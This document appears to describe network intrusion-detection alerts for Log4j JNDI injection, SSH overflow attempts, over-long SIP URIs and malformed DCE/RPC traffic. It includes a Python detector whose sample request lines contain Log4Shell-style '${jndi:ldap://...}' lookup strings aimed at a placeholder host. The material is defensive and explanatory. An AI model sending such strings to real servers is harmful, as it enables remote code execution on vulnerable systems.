The alert detects attempts to exploit the Apache Log4j vulnerability for remote code execution. The rule matches HTTP requests whose URI contains the string ${jndi: and generates an alert when such traffic is seen flowing towards the server on an established connection. It helps identify potential attempts to exploit the known Apache Log4j vulnerabilities and can aid in mitigating the risks associated with this critical security issue.
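As an added illustration, not part of the original rule descriptions, the following Python mirrors the Log4j rule's match condition (the string ${jndi: inside the request URI) over a few constructed HTTP request lines. Checking the percent-decoded URI as well is an assumption about how an HTTP-aware IDS normalizes the URI before matching; the rule text above only states the raw string.

```python
import re
from urllib.parse import unquote

# Case-insensitive form of the literal the rule matches on.
JNDI_PATTERN = re.compile(r"\$\{jndi:", re.IGNORECASE)

# Constructed sample request lines (not captured traffic); the hostname
# is a placeholder, not a real indicator.
SAMPLE_REQUEST_LINES = [
    "GET /index.html HTTP/1.1",
    "GET /search?q=${jndi:ldap://placeholder.invalid/} HTTP/1.1",
    "GET /search?q=%24%7Bjndi%3Aldap%3A//placeholder.invalid/%7D HTTP/1.1",
    "POST /api/login HTTP/1.1",
]


def extract_uri(request_line: str) -> str:
    """Return the request-target of an HTTP/1.x request line, or '' if malformed."""
    parts = request_line.split(" ")
    if len(parts) != 3 or not parts[2].startswith("HTTP/"):
        return ""
    return parts[1]


def uri_has_jndi(request_line: str) -> bool:
    """True when the URI would trip the rule.

    The raw URI is tested first, which is exactly what the rule states.
    The percent-decoded URI is tested as well (assumed IDS normalization),
    so an encoded copy of the same string is not silently missed.
    """
    uri = extract_uri(request_line)
    if not uri:
        return False
    return bool(JNDI_PATTERN.search(uri) or JNDI_PATTERN.search(unquote(uri)))


def scan(request_lines):
    """Return the indices of request lines that would raise the alert."""
    return [i for i, line in enumerate(request_lines) if uri_has_jndi(line)]


if __name__ == "__main__":
    for idx in scan(SAMPLE_REQUEST_LINES):
        print(f"alert: request {idx}: {SAMPLE_REQUEST_LINES[idx]}")
```

Note that, as described, the rule inspects only the URI; the same string arriving in a request header or body is outside its scope and needs a separate rule.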
The rule triggers when an attempt is made to exploit an overflow vulnerability in the challenge-response mechanism of SSH. An overflow vulnerability in this context suggests that an attacker is trying to send data that exceeds the allocated buffer size, potentially leading to arbitrary code execution or other security compromises.
When this rule is triggered, it indicates that the SIP message being analyzed contains a URI (such as a web address or SIP identifier) that exceeds the length limits specified in the protocol standards. This may be a sign of a malformed or potentially malicious SIP message. The rule is useful for identifying abnormal or potentially harmful SIP traffic, which could result from misconfigurations, malformed requests, or attempts to exploit vulnerabilities in SIP-based systems. When it triggers, investigate the specific SIP message to understand the cause of the excessive URI length. This may require examining the source and destination IP addresses, ports, and the content of the SIP message to determine whether it is a legitimate request with an unusually long URI or a malicious attempt to exploit a vulnerability in the SIP implementation.
The rule is triggered when an attempt is made to establish a DCE/RPC connection but the protocol version specified in the traffic is invalid or not recognized; here, the major version is not a valid DCE/RPC version. This rule can detect potential attacks or misconfigurations in which malformed or malicious DCE/RPC traffic with an invalid major version is sent in an attempt to exploit vulnerabilities or perform unauthorized actions. When it triggers, there may be a security issue or a misconfiguration in the network, and further investigation is needed to understand the nature of the traffic and take appropriate action to mitigate any potential risks.